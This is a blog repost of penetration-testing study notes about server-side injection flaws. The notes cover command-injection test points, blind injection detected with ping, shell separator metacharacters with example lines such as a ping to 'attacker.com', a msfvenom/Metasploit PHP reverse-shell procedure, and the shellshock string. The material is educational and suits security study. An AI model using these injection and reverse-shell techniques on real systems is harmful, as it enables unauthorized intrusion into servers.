Kali进行web渗透笔记(五)
2016-06-12 00:43
766 查看
Attacking the Server Using Injectinog-based Flaws
components likely to attackComponents | Injection flaws |
---|---|
Operation system shell | Command injection |
Relational database(RDBMS) | SQL injection |
Web browser | XSS attack |
LDAP directory | LDAP injection |
XML | XPATH injection |
identifying parameters to inject data:when testing a web application for command injection flaw and have identified that the applicaion is interacting with the command line of the underlying the application OS,the next step should be to manipulate and probe the different parameters in the applicaion injection flaws,as the application may be using one of these parameters to build a command back at the web server:
GET:input parameters are sent in URLs.Any user-controlled parameter sent using the GET method request should be tested.
POST:input parameters are sent in HTTP body.
HTTp header:Applications ofter use header fields to identify end users and display customized information to the user depending on the value in the headers.Some of the important header fields to check for command injection :
Cokkies
X-Forwarded-For
User-agent
Referrer
Error-based and blind command injection:In the other form of command injection,that is,blind command injeciton ,the results of the commands that you inject are not displayed to the user and no error messages are returned.The attacker will have to rely on other ways to identify whether the command was indeed executed on the server.When the output of the command is been displayed to the user,you can use any of the bash shell or windows command such as
ls,dir,ps,tasklistdepending on the underlying OS.Bue when testing for blind injection,you need to select your commands carefully.As an ethical hacker,the most reliable and safe way to identify the existence of injection flaw when the application does not display the results is using the
pingcommand.
The attacker can inject the ping c
4000
ommand to send network packets to a machine under his control and view the results on that machine using a packet capture. This may prove to be useful in several ways:
Since the ping command is similar in both Linux and Windows, except for a few changes, the command is sure to run if the application is vulnerable to the injection flaw.
By analysing the response in the ping output, the attacker can also identify the underlying OS using the TTL values.
By analysing the response in the ping output, the attacker can also identify the underlying OS using the TTL values.
The ping utility is usually not restricted; even if the application is running under a non-privileged account, your chances of getting the command executed is guaranteed.
The input buffer is often limited in size and can only accept a finite number of characters, for example, the input field for the username. The ping command, along with the IP addresses and some additional arguments can easily be injected in these fields.
Metacharacters for command separator:
Symbol | Usage |
---|---|
; | The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon. |
&& | The double ampersand would run the command to the right of the metacharacter only if the command to the left executed successfully.An example would be injecting the password field, along with the correct credentials. A command can be injected that would run once the user is authenticated to the system. |
// | The double pipe metacharacter is directly opposite to the double ampersand.It would run the command on the right side only if the command on the lefthand side failed. Following is an example of this command:cd invalidDir // ping -c 2 attacker.com |
( ) | Using the grouping metacharacter, you can combine the outputs of multiple commands and store it in a file. Following is an example of this command: (ps; netstat) > running.txt |
` | The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command:Variable= "OS versionuname -a " && echo $variable |
> | This character would append the output of the command on the left to the file named on the right of the character. |
/ | The single pipe will use the output of the command on the left as an input to the command specified on the right. |
Wapiti can test for file handing flaws by exploiting the include function calls.It scans for old backup files accessible on the server and alo attempts to bypass weak htacess configurations.
Following are some of the activities that can ben performed by exploiting a command injection flaw:
Viewing file on the web server
Deleting files on the web server
Attacking other machines on the internal network of the organization
Completely owing the web server
Reverse TCP connection:Generally firewall rules are more relaxed when traffic flows from internal to external
PHP shell and Metasploit
Create a PHP shell using the msfvenom tool
Upload it on a web server that can be accessed from the target.
Set up a reverse TCP meterpreter session in Metasploit on the attacker’s machine waiting for target to connect.
Inject the URL of the PHP shell to the vulnerable field of the application,which downloads the PHP shell and runs it on the server.
The shell would then make n outbound TCP connection to the meterpreter session waiting on the attacker’s machine.
Exploiting shellshock
The flaw was found in the bash shell developed many years ago ,which allowed the attacker to exploit it by just passing a specific series of strings to the bash shell:
(){:;};.
Since bash shell is used by many applications,such as DHCP,SSH,SIP,and SMTP,the attack surface increases to a great extent.Exploiting the flaw over HTTP request is still the most common wy to do it ,as bash shell is often used along with CGI scripts.
相关文章推荐
- java-WEB中的监听器Lisener
- GUI - Web前端开发框架
- Extjs4.0 最新最全视频教程
- MyEclipse Web Project转Eclipse Dynamic Web Project
- axis备忘
- 创业如何选择WEB开发语言
- Erlang实现的一个Web服务器代码实例
- 防止网页脚本病毒执行的方法-from web
- 自学成才的秘密:115个 web Develop 资源
- 使用批处理修改web打印设置笔记 适用于IE
- Apache Web让JSP“动”起来
- web下载的ActiveX控件自动更新
- 推荐六款WEB上传组件性能测试与比较第1/10页
- 关于三种主流WEB架构的思考
- 使用 Iisext.vbs 列出 Web 服务扩展文件的方法
- 使用 Iisext.vbs 删除 Web 服务扩展文件的方法
- 使用 iisext.vbs 禁用 Web 服务扩展的方法
- 用vbs 实现从剪贴板中抓取一个 URL 然后在浏览器中打开该 Web 站点
- web标准知识——从p开始,循序渐进
- web标准知识――用途相似的标签